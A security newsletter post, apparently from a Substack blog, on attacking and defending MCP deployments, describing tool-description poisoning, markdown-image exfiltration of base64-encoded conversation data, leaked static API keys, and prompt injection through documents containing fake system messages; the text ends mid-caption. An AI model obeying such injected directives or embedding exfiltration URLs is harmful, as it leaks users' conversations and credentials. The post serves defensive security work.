srcset="https://substackcdn.com/image/fetch/$s_!fl9W!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 424w, https://substackcdn.com/image/fetch/$s_!fl9W!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 848w, https://substackcdn.com/image/fetch/$s_!fl9W!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 1272w, https://substackcdn.com/image/fetch/$s_!fl9W!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fl9W!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png" width="1376" height="768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:768,&quot;width&quot;:1376,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2350730,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/188403113?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4598a65-27a9-43b9-8091-307b703875f7_1376x768.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fl9W!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 424w, https://substackcdn.com/image/fetch/$s_!fl9W!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 848w, https://substackcdn.com/image/fetch/$s_!fl9W!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 1272w, https://substackcdn.com/image/fetch/$s_!fl9W!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> MCP ships with a trust model that treats every tool description as benign, every server output as safe to render, and every credential as someone else's problem. A scan of 5,200+ live deployments found 53% running on static API keys, no rotation, no scoping, no audit trail. We ran <a href="https://www.toxsec.com/p/lets-poison-the-mcp">the full attack chains last time</a>. Today we kill them. Your <strong>MCP tool poisoning defense</strong> starts at three trust boundaries.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>How MCP Tool Poisoning Hijacks the Model</h2><p>The first step in any <strong>MCP tool poisoning defense</strong> is understanding exactly what we&#8217;re injecting. We plug a malicious tool into a target MCP deployment. Our tool description looks clean, just metadata describing what the tool does. Fifty words. The MCP client hands that description directly to the model before the user types anything. No sanitization pass. No privilege boundary. No audit log entry.</p><p>So we stuff the description field with directives. The exact syntax varies by model, but the <strong>MCP tool poisoning</strong> pattern is the same: hide a secondary instruction inside what looks like documentation. The model reads it. The model obeys it. The user sees nothing, because tool descriptions don&#8217;t render in the chat UI. We wrote a system prompt without touching the system prompt. The access control that matters, system prompt trust, just got bypassed through the metadata layer.</p><p>This is <a href="https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks">tool description poisoning</a>. The attack surface is every tool you haven&#8217;t manually reviewed. In a production MCP deployment pulling from third-party registries, that&#8217;s most of them. Auto-approve is on by default. The math is simple: <strong>84% attack success rate</strong> in controlled testing when auto-approve is enabled.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2j1_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2j1_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 424w, https://substackcdn.com/image/fetch/$s_!2j1_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 848w, https://substackcdn.com/image/fetch/$s_!2j1_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 1272w, https://substackcdn.com/image/fetch/$s_!2j1_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2j1_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png" width="467" height="549.9886914378029" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5b543602-3378-4d50-83e4-5a3364612500_619x729.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:729,&quot;width&quot;:619,&quot;resizeWidth&quot;:467,&quot;bytes&quot;:38318,&quot;alt&quot;:&quot;Terminal &#8212; mcp-scan output flagging a poisoned tool description. Tool name in yellow, IMPORTANT directive highlighted red with payload partially visible, auto-approve status shown as ENABLED in red.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/188403113?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Terminal &#8212; mcp-scan output flagging a poisoned tool description. Tool name in yellow, IMPORTANT directive highlighted red with payload partially visible, auto-approve status shown as ENABLED in red." title="Terminal &#8212; mcp-scan output flagging a poisoned tool description. Tool name in yellow, IMPORTANT directive highlighted red with payload partially visible, auto-approve status shown as ENABLED in red." srcset="https://substackcdn.com/image/fetch/$s_!2j1_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 424w, https://substackcdn.com/image/fetch/$s_!2j1_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 848w, https://substackcdn.com/image/fetch/$s_!2j1_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 1272w, https://substackcdn.com/image/fetch/$s_!2j1_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5b543602-3378-4d50-83e4-5a3364612500_619x729.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Markdown Rendering Becomes the Exfil Channel</h2><p>MCP clients render markdown. That&#8217;s the feature. That&#8217;s also the exfil channel.</p><p>We craft a tool that returns markdown containing an image tag pointing to our server. The URL carries a base64-encoded blob of the conversation context as a query parameter, whatever the model had access to at call time. The client renders the markdown. The user&#8217;s browser fires a GET request to retrieve the image. Our server logs the request. Query string decoded, conversation history in hand. No clicks. No prompts. No warnings.</p><p>The tell is in the URL. A legitimate image looks like <code>/photo.jpg</code>. A <strong>markdown image exfiltration</strong> URL looks like <code>/pixel.png?q=dXNlciBhc2tlZCBhYm91dCBwcm9qZWN0</code>. That long base64 blob in the query string is the fingerprint. Most MCP clients don&#8217;t scan for it. Bing Chat hit this exact pattern in 2023. The chain is two assumptions stacked: the model trusts the tool enough to embed the URL, and the client trusts the model output enough to render it without inspection. Both assumptions are wrong in adversarial conditions, and both are on by default. If you&#8217;ve followed our <a href="https://www.toxsec.com/p/dark-llms-voice-clones">agentic browser breakdown</a>, you&#8217;ve seen this same rendering trust problem in the wild.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!maBs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!maBs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 424w, https://substackcdn.com/image/fetch/$s_!maBs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 848w, https://substackcdn.com/image/fetch/$s_!maBs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 1272w, https://substackcdn.com/image/fetch/$s_!maBs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!maBs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png" width="535" height="507.1589310829817" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:674,&quot;width&quot;:711,&quot;resizeWidth&quot;:535,&quot;bytes&quot;:41535,&quot;alt&quot;:&quot;Terminal &#8212; attacker VPS access log. Incoming GET request with long base64 query string highlighted red, decoded payload shown below revealing conversation context and a partially redacted API token.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/188403113?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Terminal &#8212; attacker VPS access log. Incoming GET request with long base64 query string highlighted red, decoded payload shown below revealing conversation context and a partially redacted API token." title="Terminal &#8212; attacker VPS access log. Incoming GET request with long base64 query string highlighted red, decoded payload shown below revealing conversation context and a partially redacted API token." srcset="https://substackcdn.com/image/fetch/$s_!maBs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 424w, https://substackcdn.com/image/fetch/$s_!maBs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 848w, https://substackcdn.com/image/fetch/$s_!maBs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 1272w, https://substackcdn.com/image/fetch/$s_!maBs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fef8d9fe9-110a-40bd-b25c-ef491c90bb43_711x674.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>53% of MCP Servers Leak Static Credentials</h2><p>We don&#8217;t need to run either attack above if the deployment hands us credentials directly. A 2025 scan of 5,200+ live MCP servers found <strong>53% running on static API keys</strong> baked into <code>.env</code> files and config JSON, long-lived, rarely rotated, copy-pasted across machines. Only 8.5% use OAuth. That&#8217;s the state of <strong>MCP credential security</strong> right now.</p><p>Those keys sit next to GitHub PATs, AWS access keys, and Slack bot tokens in the same config file. An MCP server connected to Gmail, Google Drive, or an open Postgres instance with a static key is a single point of failure with a long fuse. Pop the key, or find it in a leaked config on GitHub where plenty of these land, and the blast radius covers everything that key touches. The <a href="https://www.toxsec.com/p/molt-road-and-ai-black-markets">Moltbook breach</a> showed this at scale: 4,060 private DMs containing plaintext API keys that agents shared with each other.</p><p>Shodan scans in 2025 found exposed MCP servers connected to Gmail, Drive, Jira, and live databases. Auto-approve on. No rate limiting. No audit log. Just sitting there, waiting for someone to ask the right question.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!U5e_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!U5e_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 424w, https://substackcdn.com/image/fetch/$s_!U5e_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 848w, https://substackcdn.com/image/fetch/$s_!U5e_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 1272w, https://substackcdn.com/image/fetch/$s_!U5e_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!U5e_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png" width="796" height="562" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:562,&quot;width&quot;:796,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:39140,&quot;alt&quot;:&quot;Scan output &#8212; structured results table across 5,200 MCP servers. Rows: static API keys (53%, critical red), GitHub PATs (17%, high orange), OAuth usage (8.5%, info gray). Summary bar at bottom showing total exposure count.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/188403113?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Scan output &#8212; structured results table across 5,200 MCP servers. Rows: static API keys (53%, critical red), GitHub PATs (17%, high orange), OAuth usage (8.5%, info gray). Summary bar at bottom showing total exposure count." title="Scan output &#8212; structured results table across 5,200 MCP servers. Rows: static API keys (53%, critical red), GitHub PATs (17%, high orange), OAuth usage (8.5%, info gray). Summary bar at bottom showing total exposure count." srcset="https://substackcdn.com/image/fetch/$s_!U5e_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 424w, https://substackcdn.com/image/fetch/$s_!U5e_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 848w, https://substackcdn.com/image/fetch/$s_!U5e_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 1272w, https://substackcdn.com/image/fetch/$s_!U5e_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F990dc118-46cd-47f1-9469-8640f35a6af6_796x562.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Prompt Injection Bypasses the Document Trust Layer</h2><p>The model trust hierarchy has a seam. System prompt sits at the top. User messages sit below it. Tool outputs and document contents sit below that. This hierarchy is supposed to prevent tool outputs from hijacking the model&#8217;s behavior. It mostly works.</p><p>Until we stuff the attack into a document.</p><p>We craft a PDF or text file that wraps a payload inside fake conversation history. The document looks like a log excerpt, a support transcript, something plausible. Inside it, a block formatted to look like an earlier system message or privileged instruction. We drop that document into context through a file upload, a RAG pipeline, or a tool output that fetches external content. The model reads it and, depending on how faithfully it enforces privilege levels, treats the fake history as real. Instructions from nowhere, executed by something that should know better.</p><p>This is <strong>prompt injection via document</strong>, the same logic flaw that gets <a href="https://www.toxsec.com/p/the-agent-economy-is-waking-up">web agents pwned through poisoned HTML</a> and malicious PDFs. The MCP version is nastier because tool outputs fetch external content silently, without a visible user action. The user never touched the document. The model did. The <a href="https://cheatsheetseries.owasp.org/cheatsheets/LLM_Prompt_Injection_Prevention_Cheat_Sheet.html">OWASP LLM Top 10</a> rates prompt injection as the number one vulnerability for exactly this reason.</p><p>Anthropic, OpenAI, and Google are all shipping instruction hierarchy improvements. It&#8217;s getting harder. It&#8217;s not solved.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!x3wL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!x3wL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 424w, https://substackcdn.com/image/fetch/$s_!x3wL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 848w, https://substackcdn.com/image/fetch/$s_!x3wL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 1272w, https://substackcdn.com/image/fetch/$s_!x3wL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!x3wL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png" width="820" height="640" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/90364f20-245d-428c-b793-2ca31b82f3b1_820x640.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:640,&quot;width&quot;:820,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:39386,&quot;alt&quot;:&quot;Code/config screen &#8212; extracted PDF text with line numbers. Lines 1-5 look like a normal support transcript. Lines 7-11 highlighted red: fake SYSTEM blocks injected mid-document, payload redacted with block 